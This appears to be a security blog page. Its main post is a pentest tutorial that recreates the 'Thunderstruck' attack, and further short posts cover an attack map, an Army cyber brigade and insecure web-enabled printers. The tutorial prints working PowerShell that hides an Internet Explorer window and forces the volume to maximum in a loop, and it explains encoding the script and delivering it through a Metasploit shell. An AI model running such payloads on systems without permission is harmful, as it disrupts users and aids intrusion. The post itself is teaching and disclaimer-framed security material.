Recreating Iran AC/DC Thunderstruck Worm with PowerShell & Metasploit

Iran Thunderstruck

About three years ago computer workstations at two Iranian nuclear facilities allegedly began playing AC/DC’s Thunderstruck at random times and at full volume. How cool would it be to use this during your next computer security pentest?

Well, you can!

In this tutorial we will see how to recreate this cool attack with PowerShell and use it with Metasploit in Kali Linux.

But first some disclaimers:

Unless you are in an American or allied cyber unit, trying to infect a foreign nation’s nuclear computers is pretty much a no,no – so don’t do it. Actually using this against any systems that you do not have express written permission to do so will probably end you up in jail – so again, don’t do it. Lastly, this is not new, it is from a PowerShell script that is about 2 years old.

In this tutorial we will be borrowing the PowerShell code to play AC/DC’s hit song at full volume from a botnet script written by Christopher “@obscuresec” Campbel. If you did not see his 2013 Shmoocon talk, “Building a PowerShell Bot”, check this out:

The code can be found at his Github site.

We will also be using a technique by Mubix to encode the PowerShell script so we can deliver it via Meterpreter.

Lastly we will need a willing Windows 7 system as a target, this attack did not seem to work very well using a VMware virtual machine for a target (the up volume loop seems to bog systems down pretty good), so I used a stand alone system.

Playing “Thunderstruck” on a remote system:

1. From obscuresec’s botnet code, grab the Thunderstruck section:

[string] $VideoURL = “http://www.youtube.com/watch?v=v2AC41dglnM”
#Create hidden IE Com Object
$IEComObject = New-Object -com “InternetExplorer.Application”
$IEComObject.visible = $False
$IEComObject.navigate($VideoURL)
$EndTime = (Get-Date).addminutes(3)
Write-Verbose “Loop will end at $EndTime”
#ghetto way to do this but it basically presses volume up to raise volume in a loop for 3 minutes
do {
$WscriptObject = New-Object -com wscript.shell
$WscriptObject.SendKeys([char]175)
}
until ((Get-Date) -gt $EndTime)

The VideoURL string sets the song, which is of course, Thunderstruck. The $IEComObject section tells PowerShell to open Internet Explorer on the target system and navigate to the YouTube video. ** Note ** the .visible = $False section tells PowerShell to hide the IE window so that it does not show up. Set this to $True if you want to be able to see the Internet Explorer window.

The rest of the script creates a 3 minute loop (the length of the song) where the Up Volume key (char 175) is called repeatedly. As mentioned earlier, this loop seems to really draw down the target computer, you may want to set it to a shorter time period.

2. Put the code in a text file, which I called “Thunderstruck.txt“.

3. Base64 encode the script:

Iran Thunderstruck 2

And that is it, now all we need to do is use Metasploit to get a remote shell to the target system and then call the encoded script in our remote shell using PowerShell, like so:

Iran Thunderstruck 3

And that is it, after a short pause the target remote system will begin playing “Thunderstruck” at maximum volume. If the user tries to turn down the volume using the speaker icon, it will fight them by turning it back up until the song is over!

Iran Thunderstruck 4

Defending against this attack

The bad thing about PowerShell based attacks is that most Anti-Viruses and Windows do not see them as malicious. So your best bet is to never, ever open unsolicited attachments you receive in social media sites or via e-mails. Also, run script blocking programs to prevent unwanted scripts from running on sites that you visit. Lastly, never, ever try to build nuclear weapons!

Advertisements

Watching Chinese Cyber Attacks against US as they Happen

Cyber Attack 4

I just happened to be up very early this morning and caught some of the chatter on Twitter about massive incoming cyber attacks against the US. So I pulled up the Live Attack map from Norse to check it out and saw the amazing image above.

From what I have seen, usually America and China are fairly even in the attack origins category.  But this morning there just seemed to be a flood of attacks from China being recorded by the Norse honeypot systems in St. Louis.

Stunning that the image just represents a fraction of real world attacks that are happening at any moment.

 

 

US Army Activates “Cyber Protection Brigade”

Army Cyber Brigade

On Friday the US Army activated what it is calling a “Cyber Protection Brigade”.

According to a post on Army.mil’s website:

“The Army is activating a Cyber Protection Brigade today, and discussing a new cyber branch that could be established as early as next month.

Command Sgt. Maj. Rodney D. Harris, Army Cyber Command, said the branch announcement could come as early as the second week of October, during the Association of the U.S. Army’s annual meeting.

The Cyber Protection Brigade is being activated by the U.S. Army Network Enterprise Technology Command at Fort Gordon, Georgia. It’s the first brigade of its kind in the Army and the nucleus of the new unit will be its cyber protection teams, according to the command.”

The cyber soldiers who are highly trained by the military will help defend the Army’s systems, but will also include offensive strike teams.

“The cyber teams will be roughly platoon-sized, but vary depending on their mission. The combat-mission or offense teams are larger, Harris said. The network defense or cyber-protection teams are mid-size.”

The Army may create a new cyber branch next month. It can take up to three years to train a NCO cyber leader, making it one of the longest training cycles. And with computer attacks increasing every day, the Army is focusing on obtaining and retaining troops who have cyber skills.

 

Web Enabled Printer (In)Security

Printer Insecurities

In the name of simplicity, it seems like every device is “Web Enabled” now. But the question is, where is the security? I was always stunned on how many Printers you can find completely open on the web through Shodan. I never understood why, until now.

I was setting up a brand new “web enabled” printer. It went great, the quick start guide walked me through installing the ink cartridges, had a great video on connecting the paper trays to the printer and how to correctly insert paper.

It even walked me through turning on networking and getting it connected to my Wireless network.

In no time I was up and running!

It wanted to turn on printing from the internet, it got an e-mail address from the web all by itself and then wanted to turn on additional apps. It was so helpful!

But then I wondered, how is this thing secured?!?

So, I surf to the IP address that the printer was assigned and it had a beautiful web control interface for the printer. That was completely unsecured…

I dug through the menus and finally found the option to turn Web Based security to “On” and put in an administrator password. It informed me that it would not block internet users from seeing everything, but would limit them informational pages only.

Then I realized, it never prompted me to turn control panel security on, and never asked me for a password. So I dug through the included manual (instead of just browsing the quick start guide) thinking I missed something.

Everything was in the manual, including troubleshooting network connectivity. But nowhere did it mention turning security on or how to even do it!

It’s just a printer you say – But printers can leak some very important information, like internal network settings, logs, files and in some cases, even user accounts.

And a few quick keyword searched on Shodan turns up Tens of thousands of insecure printers.

Yikes!

Last month the author of “Shodan Blog” wrote a great article on printers bleeding information publicly.

Titled, “I know You Need Toner“, it lists the printers worldwide that currently are in need of toner:

Need Toner

It also shows the number of printers that need toner by country, and a list of the top organizations that need to change their toner.

Cute, I know, but it should really be a warning to people about what information is being bled publicly through the horde of web enabled devices that we are putting throughout our organizations.

It took several years, but most router manufacturers now ship new routers with some level of security turned on. It looks like other web enabled devices (like printers) need to start doing this too!